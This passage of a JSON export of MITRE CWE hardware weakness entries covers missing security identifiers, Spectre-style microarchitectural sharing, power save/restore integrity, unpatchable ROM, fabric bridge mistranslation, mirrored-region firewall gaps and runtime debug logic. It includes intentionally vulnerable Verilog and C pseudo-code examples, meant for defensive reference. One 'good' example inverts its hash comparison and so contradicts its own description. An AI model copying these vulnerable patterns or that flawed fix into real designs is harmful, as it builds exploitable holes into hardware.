become physically altered to a degree such that even after the original data is erased that data can still be recovered through physical characterization of the memory cells."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"226","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Memory","Read Application Data"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Apply blinding or masking techniques to implementations of cryptographic algorithms."},{"Phase":"Implementation","Description":"Alter the method of erasure, add protection of media, or destroy the media to protect the data."}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"37"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1117"}},{"attr":{"@_External_Reference_ID":"REF-1118"}},{"attr":{"@_External_Reference_ID":"REF-1119"}},{"attr":{"@_External_Reference_ID":"REF-1120"}},{"attr":{"@_External_Reference_ID":"REF-1055"}}]},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Nicole Fern","Submission_Organization":"Tortuga Logic","Submission_Date":"2020-05-29"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"1302":{"attr":{"@_ID":"1302","@_Name":"Missing Security Identifier","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product implements a security identifier mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. A transaction is sent without a security identifier.","Extended_Description":{"xhtml:p":["In a System-On-Chip (SoC), various integrated circuits and hardware engines generate transactions such as to access (reads/writes) assets or perform certain actions (e.g., reset, fetch, compute). A typical transaction is comprised of source identity (to identify the originator of the transaction) and a destination identity (to route the transaction to the respective entity) in addition to much more information in the message. Sometimes the transactions are qualified with a Security Identifier. This Security Identifier helps the destination agent decide on the set of allowed or disallowed actions.","A common weakness that can exist in such transaction schemes is that the source agent fails to include the necessary, security identifier with the transaction. Because of the missing security identifier, the destination agent might drop the message, thus resulting in Denial-of-Service (DoS), or get confused in its attempt to execute the given action, which confusion could result in privilege escalation or a gain of unintended access."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1294","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases."},{"Phase":"Implementation","Note":"Such issues could be introduced during implementation and identified later during Testing or System Configuration phases."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Modify Memory","Read Memory","DoS: Crash, Exit, or Restart","Bypass Protection Mechanism","Execute Unauthorized Code or Commands"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Transaction details must be reviewed for design inconsistency and common weaknesses."},{"Phase":"Implementation","Description":"Security identifier definition and programming flow must be tested in pre-silicon and post-silicon testing."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["Consider a system with a register for storing AES key for encryption or decryption. The key is of 128 bits implemented as a set of four 32-bit registers. The key registers are assets, and the register AES_KEY_ACCESS_POLICY is defined to provide the necessary access controls.","The access-policy register defines which agents with a security identifier in the transaction can access the AES-key registers. Each bit in this 32-bit register defines a security identifier. There could be a maximum of 32 security identifiers that are allowed accesses to the AES-key registers. The number of the bit when set (i.e., \u201c1\u201d) allows for a respective action from an agent whose identity matches the number of the bit; if set to \u201c0\u201d (i.e., Clear), it disallows the respective action to that corresponding agent."]},"Example_Code":[{"attr":{"@_Nature":"bad"},"xhtml:table":{"xhtml:tr":[{"xhtml:th":["Register","Field description"]},{"xhtml:td":["AES_ENC_DEC_KEY_0","AES key [0:31] for encryption or decryption, Default 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_1","AES key [32:63] for encryption or decryption, Default 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_2","AES key [64:95] for encryption or decryption, Default 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_4","AES key [96:127] for encryption or decryption, Default 0x00000000"]},{"xhtml:td":["AES_KEY_ACCESS_POLICY","[31:0] Default 0x00000004 \u2013 agent with Security Identifier \u201c2\u201d has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_4 registers"]}]}},{"attr":{"@_Nature":"good"},"xhtml:table":{"xhtml:tr":[{"xhtml:th":["Register","Field description"]},{"xhtml:td":["AES_ENC_DEC_KEY_0","AES key [0:31] for encryption or decryption, Default 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_1","AES key [32:63] for encryption or decryption, Default 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_2","AES key [64:95] for encryption or decryption, Default 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_4","AES key [96:127] for encryption or decryption, Default 0x00000000"]},{"xhtml:td":["AES_KEY_ACCESS_POLICY","[31:0] Default 0x00000002 \u2013 agent with security identifier \u201c2\u201d has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_4 registers"]}]}}],"Body_Text":["The originator sends a transaction with no security identifier, i.e., meaning the value is \u201c0\u201d or NULL. The AES-Key-access register does not allow the necessary action and drops the transaction because the originator failed to include the required security identifier.","The originator should send a transaction with Security Identifier \u201c2\u201d which will allow access to the AES-Key-access register and allow encryption and decryption operations."]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"1"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-14"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1303":{"attr":{"@_ID":"1303","@_Name":"Non-Transparent Sharing of Microarchitectural Resources","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Hardware structures shared across execution contexts (e.g., caches and branch predictors) can violate the expected architecture isolation between contexts.","Extended_Description":{"xhtml:p":["Modern processors use techniques such as out-of-order execution, speculation, prefetching, data forwarding, and caching to increase performance. Details about the implementation of these techniques are hidden from the programmer\u2019s view. This is problematic when the hardware implementation of these techniques results in resources being shared across supposedly isolated contexts. Contention for shared resources between different contexts opens covert channels that allow malicious programs executing in one context to recover information from another context.","Some examples of shared micro-architectural resources that have been used to leak information between contexts are caches, branch prediction logic, and load or store buffers. Speculative and out-of-order execution provides an attacker with increased control over which data is leaked through the covert channel.","If the extent of resource sharing between contexts in the design microarchitecture is undocumented, it is extremely difficult to ensure system assets are protected against disclosure."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1189","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"203","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases."},{"Phase":"Implementation","Note":"Such issues could be introduced during implementation and identified later during Testing or System Configuration phases."}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Application Data","Read Memory"],"Note":"Microarchitectural side-channels have been used to leak specific information such as cryptographic keys, and Address Space Layout Randomization (ALSR) offsets as well as arbitrary memory."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Microarchitectural covert channels can be addressed using a mixture of hardware and software mitigation techniques. These include partitioned caches, new barrier and flush instructions, and disabling high resolution performance counters and timers."},{"Phase":"Requirements","Description":"Microarchitectural covert channels can be addressed using a mixture of hardware and software mitigation techniques. These include partitioned caches, new barrier and flush instructions, and disabling high resolution performance counters and timers."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["Secure programs perform bounds checking before accessing an array if the source of the array index is provided by an untrusted source such as user input. In the code below, data from array1 will not be accessed if x is out of bounds. However, if this code executes on a processor that performs speculative execution the outcome of the if statement could be mis-predicted and the access on the next line will occur with a value of x that can point to arbitrary locations in the program\u2019s memory (out-of-bounds).","Even though the processor rolls back the architectural effects of the mis-predicted branch, the memory accesses alter data cache state, which is not rolled back after the branch is resolved. The cache state can reveal array1[x] thereby providing a mechanism to recover any word in this program\u2019s memory space."]},"Example_Code":{"#text":"if (x < array1_size)\\n \\t\\t\\t\\t\\t\\ty = array2[array1[x] * 4096];","attr":{"@_Nature":"bad"}},"Body_Text":"Code snippet is from the Spectre paper: https://spectreattack.com/spectre.pdf."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"663"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1121"}},{"attr":{"@_External_Reference_ID":"REF-1122"}},{"attr":{"@_External_Reference_ID":"REF-1123"}},{"attr":{"@_External_Reference_ID":"REF-1124"}}]},"Content_History":{"Submission":{"Submission_Name":"Nicole Fern","Submission_Organization":"Tortuga Logic","Submission_Date":"2020-05-08"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Related_Attack_Patterns"}}},"1304":{"attr":{"@_ID":"1304","@_Name":"Improperly Preserved Integrity of Hardware Configuration State During a Power Save/Restore Operation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product performs a power save/restore\\n operation, but it does not ensure that the integrity of\\n the configuration state is maintained and/or verified between\\n\\t the beginning and ending of the operation.","Extended_Description":{"xhtml:p":"Before powering down, the Intellectual\\n Property (IP) saves current state (S) to persistent\\n storage such as flash or always-on memory in order to\\n optimize the restore operation. During this process,\\n an attacker with access to the persistent storage may\\n alter (S) to a configuration that could potentially\\n modify privileges, disable protections, and/or cause\\n damage to the hardware. If the IP does not validate\\n the configuration state stored in persistent memory,\\n upon regaining power or becoming operational again,\\n the IP could be compromised through the activation of\\n an unwanted/harmful configuration."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"345","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1271","@_View_ID":"1194"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Weakness introduced via missing internal integrity guarantees during power save/restore"},{"Phase":"Integration","Note":"Weakness introduced via missing external integrity verification during power save/restore"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["DoS: Instability","DoS: Crash, Exit, or Restart","DoS: Resource Consumption (Other)","Gain Privileges or Assume Identity","Bypass Protection Mechanism","Alter Execution Logic","Quality Degradation","Unexpected State","Reduce Maintainability","Reduce Performance","Reduce Reliability"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Inside the IP, incorporate integrity checking\\n on the configuration state via a cryptographic\\n hash. The hash can be protected inside the IP such as\\n by storing it in internal registers which never lose\\n power. Before powering down, the IP performs a hash of\\n the configuration and saves it in these persistent\\n registers. Upon restore, the IP performs a hash of the\\n saved configuration and compares it with the\\n saved hash. If they do not match, then the IP should\\n not trust the configuration."},{"Phase":"Integration","Description":"Outside the IP, incorporate integrity checking\\n of the configuration state via a trusted agent. Before\\n powering down, the trusted agent performs a hash of the\\n configuration and saves the hash in persistent storage.\\n Upon restore, the IP requests the trusted agent\\n validate its current configuration. If the\\n configuration hash is invalid, then the IP should not\\n trust the configuration."},{"Phase":"Integration","Description":"Outside the IP, incorporate a protected\\n environment that prevents undetected modification of\\n the configuration state by untrusted agents. Before\\n powering down, a trusted agent saves the IP\u2019s\\n configuration state in this protected location that\\n only it is privileged to. Upon restore, the trusted\\n agent loads the saved state into the IP."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following pseudo code demonstrates the\\n power save/restore workflow which may lead to weakness\\n through a lack of validation of the config state after\\n restore.","Example_Code":[{"#text":"void save_config_state(){}void restore_config_state(){}","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:br":["","","","","","",""],"xhtml:div":[{"#text":"void* cfg;cfg = get_config_state();save_config_state(cfg);go_to_sleep();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""]},{"#text":"void* cfg;cfg = get_config_file();load_config_file(cfg);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}]},{"#text":"void save_config_state(){}void restore_config_state(){}","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","","","","",""],"xhtml:div":[{"#text":"void* cfg;void* sha;cfg = get_config_state();save_config_state(cfg);// save hash(cfg) to trusted locationsha = get_hash_of_config_state(cfg);save_hash(sha);go_to_sleep();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","","","","",""]},{"#text":"void* cfg;void* sha_1, sha_2;cfg = get_config_file();// restore hash of config from trusted memorysha_1 = get_persisted_sha_value();sha_2 = get_hash_of_config_state(cfg);if (sha_1 != sha_2)load_config_file(cfg);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","","","","",""],"xhtml:div":{"#text":"assert_error_and_halt();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}]}],"Body_Text":["The following pseudo-code is the proper workflow for the integrity checking mitigation:","It must be noted that in the previous example of\\n good pseudo code, the memory (where the hash of the\\n config state is stored) must be trustworthy while the\\n hardware is between the power save and restore states."]}},"Functional_Areas":{"Functional_Area":"Power"},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"176"}}},"Content_History":{"Submission":{"Submission_Organization":"Accellera Systems Initiative","Submission_Date":"2020-07-16"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Functional_Areas"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"1310":{"attr":{"@_ID":"1310","@_Name":"Missing Ability to Patch ROM Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Missing an ability to patch ROM code may leave a System or System-on-Chip (SoC) in a vulnerable state.","Extended_Description":{"xhtml:p":["A System or System-on-Chip (SoC) that implements a boot process utilizing security mechanisms such as Root-of-Trust (RoT) typically starts by executing code from a Read-only-Memory (ROM) component. The code in ROM is immutable, hence any security vulnerabilities discovered in the ROM code can never be fixed for the systems that are already in use.","A common weakness is that the ROM does not have the ability to patch if security vulnerabilities are uncovered after the system gets shipped. This leaves the system in a vulnerable state where an adversary can compromise the SoC."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1329","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1277","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"This issue could be introduced during hardware architecture and design and can be identified later during Testing."},{"Phase":"Implementation","Note":"This issue could be introduced during implementation and can be identified later during Testing."},{"Phase":"Integration","Note":"This issue could be introduced during integration and can be identified later during Testing."},{"Phase":"Manufacturing","Note":"This issue could be introduced during manufacturing and can be identified later during Testing."}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Varies by Context","Reduce Maintainability"],"Likelihood":"High","Note":"A consequence of this is that the system is unable to be patched and leaves it in a vulnerable state."}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:ul":{"xhtml:li":["1. Secure patch support to allow ROM code to be patched at next boot.","2. Support patches that can be programmed in-field or during manufacturing through hardware fuses. This feature can be used to do limited patching of device after shipping or for next batch of silicon devices manufactured without changing the full device ROM."]}},"Effectiveness":"Moderate","Effectiveness_Notes":"Some part of the hardware initialization or signature verification done to authenticate patches will always be \\"not patchable.\\" Hardware-fuse-based patches will also have limitations in terms of size and the number of patches that can be supported."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-146"},"Intro_Text":{"xhtml:p":"A System-on-Chip (SOC) implements a Root-of-Trust (RoT) in ROM to boot secure code. However, at times this ROM code might have security vulnerabilities and need to be patched. Since ROM is immutable, it can be impossible to patch."},"Body_Text":"ROM does not have built-in application-programming interfaces (APIs) to patch if the code is vulnerable. Implement mechanisms to patch the vulnerable ROM code."}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1121"}},{"attr":{"@_External_Reference_ID":"REF-1122"}},{"attr":{"@_External_Reference_ID":"REF-1123"}},{"attr":{"@_External_Reference_ID":"REF-1124"}}]},"Content_History":{"Submission":{"Submission_Name":"Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-04-25"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples, Maintenance_Notes"}]}},"1311":{"attr":{"@_ID":"1311","@_Name":"Improper Translation of Security Attributes by Fabric Bridge","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The bridge incorrectly translates security attributes from either trusted to untrusted or from untrusted to trusted when converting from one fabric protocol to another.","Extended_Description":{"xhtml:p":["A bridge allows IP blocks supporting different fabric protocols to be integrated into the system. Fabric end-points or interfaces usually have dedicated signals to transport security attributes. For example, HPROT signals in AHB, AxPROT signals in AXI, and MReqInfo and SRespInfo signals in OCP.","The values on these signals are used to indicate the security attributes of the transaction. These include the immutable hardware identity of the controller initiating the transaction, privilege level, and type of transaction (e.g., read/write, cacheable/non-cacheable, posted/non-posted).","A weakness can arise if the bridge IP block, which translates the signals from the protocol used in the IP block endpoint to the protocol used by the central bus, does not properly translate the security attributes. As a result, the identity of the initiator could be translated from untrusted to trusted or vice-versa. This could result in access-control bypass, privilege escalation, or denial of service."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}}],"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control"],"Impact":["Modify Memory","Read Memory","Gain Privileges or Assume Identity","Bypass Protection Mechanism","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"The translation must map signals in such a way that untrusted agents cannot map to trusted agents or vice-versa."},{"Phase":"Implementation","Description":"Ensure that the translation maps signals in such a way that untrusted agents cannot map to trusted agents or vice-versa."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["The bridge interfaces between OCP and AHB end points. OCP uses MReqInfo signal to indicate security attributes, whereas AHB uses HPROT signal to indicate the security attributes. The width of MReqInfo can be customized as needed. In this example, MReqInfo is 5-bits wide and carries the privilege level of the OCP controller.","The values 5\u2019h11, 5\u2019h10, 5\u2019h0F, 5\u2019h0D, 5\u2019h0C, 5\u2019h0B, 5\u2019h09, 5\u2019h08, 5\u2019h04, and 5\u2019h02 in MReqInfo indicate that the request is coming from a privileged state of the OCP bus controller. Values 5\u2019h1F, 5\u2019h0E, and 5\u2019h00 indicate untrusted, privilege state.","Though HPROT is a 5-bit signal, we only consider the lower, two bits in this example. HPROT values 2\u2019b00 and 2\u2019b10 are considered trusted, and 2\u2019b01 and 2\u2019b11 are considered untrusted.","The OCP2AHB bridge is expected to translate trusted identities on the controller side to trusted identities on the responder side. Similarly, it is expected to translate untrusted identities on the controller side to untrusted identities on the responder side."]},"Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Verilog"},"xhtml:div":{"#text":"module ocp2ahb(ahb_hprot,ocp_mreqinfo);output [1:0] ahb_hprot; // output is 2 bit signal for AHB HPROTinput [4:0] ocp_mreqinfo; // input is 5 bit signal from OCP MReqInfowire [6:0] p0_mreqinfo_o_temp; // OCP signal that transmits hardware identity of bus controllerwire y;reg [1:0] ahb_hprot;// hardware identity of bus controller is in bits 5:1 of p0_mreqinfo_o_temp signalassign p0_mreqinfo_o_temp[6:0] = {1\'b0, ahb_hprot[4:0], y};always @*begincase (p0_mreqinfo_o_temp[4:2])000: ahb_hprot = 2\'b11; // OCP MReqInfo to AHB HPROT mapping001: ahb_hprot = 2\'b00;010: ahb_hprot = 2\'b00;011: ahb_hprot = 2\'b01;100: ahb_hprot = 2\'b00;101: ahb_hprot = 2\'b00;110: ahb_hprot = 2\'b10;111: ahb_hprot = 2\'b00;endcaseendendmodule","xhtml:br":["","","","","","","","","","","","","","","","","","","","","","","","","","","","","",""]}},"Body_Text":"Logic in the case statement only checks for MReqInfo bits 4:2, i.e., hardware-identity bits 3:1. When ocp_mreqinfo is 5\u2019h1F or 5\u2019h0E, p0_mreqinfo_o_temp[2] will be 1. As a result, untrusted IDs from OCP 5\u2019h1F and 5\u2019h0E get translated to trusted ahb_hprot values 2\u2019b00."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}},{"attr":{"@_CAPEC_ID":"233"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-24"}}},"1312":{"attr":{"@_ID":"1312","@_Name":"Missing Protection for Mirrored Regions in On-Chip Fabric Firewall","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The firewall in an on-chip fabric protects the main addressed region, but it does not protect any mirrored memory or memory-mapped-IO (MMIO) regions.","Extended_Description":{"xhtml:p":"Few fabrics mirror memory and address ranges, where mirrored regions contain copies of the original data. This redundancy is used to achieve fault tolerance. Whatever protections the fabric firewall implements for the original region should also apply to the mirrored regions. If not, an attacker could bypass existing read/write protections by reading from/writing to the mirrored regions to leak or corrupt the original data."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1251","@_View_ID":"1194"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control"],"Impact":["Modify Memory","Read Memory","Bypass Protection Mechanism"]}},"Detection_Methods":{"Detection_Method":{"Method":"Manual Dynamic Analysis","Description":"Using an external debugger, send write transactions to mirrored regions to test if original, write-protected regions are modified. Similarly, send read transactions to mirrored regions to test if the original, read-protected signals can be read.","Effectiveness":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"The fabric firewall should apply the same protections as the original region to the mirrored regions."},{"Phase":"Implementation","Description":"The fabric firewall should apply the same protections as the original region to the mirrored regions."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A memory-controller IP block is connected to the on-chip fabric in a System on Chip (SoC). The memory controller is configured to divide the memory into four parts: one original and three mirrored regions inside the memory. The upper two bits of the address indicate which region is being addressed. 00 indicates the original region and 01, 10, and 11 are used to address the mirrored regions. All four regions operate in a lock-step manner and are always synchronized. The firewall in the on-chip fabric is programmed to protect the assets in the memory.","Body_Text":["The firewall only protects the original range but not the mirrored regions.","The attacker (as an unprivileged user) sends a write transaction to the mirrored region. The mirrored region has an address with the upper two bits set to \u201c10\u201d and the remaining bits of the address pointing to an asset. The firewall does not block this write transaction. Once the write is successful, contents in the protected-memory region are also updated. Thus, the attacker can bypass existing, memory protections.","Firewall should protect mirrored regions."]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"1"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1134"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati K. Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-06-01"}}},"1313":{"attr":{"@_ID":"1313","@_Name":"Hardware Allows Activation of Test or Debug Logic at Runtime","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"During runtime, the hardware allows for test or debug logic (feature) to be activated, which allows for changing the state of the hardware. This feature can alter the intended behavior of the system and allow for alteration and leakage of sensitive data by an adversary.","Extended_Description":{"xhtml:p":"An adversary can take advantage of test or debug logic that is made accessible through the hardware during normal operation to modify the intended behavior of the system. For example, an accessible Test/debug mode may allow read/write access to any system data. Using error injection (a common test/debug feature) during a transmit/receive operation on a bus, data may be modified to produce an unintended message. Similarly, confidentiality could be compromised by such features allowing access to secrets."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases."},{"Phase":"Implementation","Note":"Such issues could be introduced during implementation and identified later during Testing or System Configuration phases."},{"Phase":"Integration","Note":"Such issues could be introduced during integration and identified later during Testing or System configuration phases."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Modify Memory","Read Memory","DoS: Crash, Exit, or Restart","DoS: Instability","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Resource Consumption (Other)","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","Bypass Protection Mechanism","Alter Execution Logic","Quality Degradation","Unexpected State","Reduce Performance","Reduce Reliability"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Insert restrictions on when the hardware\'s test or debug features can be activated. For example, during normal operating modes, the hardware\'s privileged modes that allow access to such features cannot be activated. Configuring the hardware to only enter a test or debug mode within a window of opportunity such as during boot or configuration stage. The result is disablement of such test/debug features and associated modes during normal runtime operations."},{"Phase":"Implementation","Description":"Insert restrictions on when the hardware\'s test or debug features can be activated. For example, during normal operating modes, the hardware\'s privileged modes that allow access to such features cannot be activated. Configuring the hardware to only enter a test or debug mode within a window of opportunity such as during boot or configuration stage. The result is 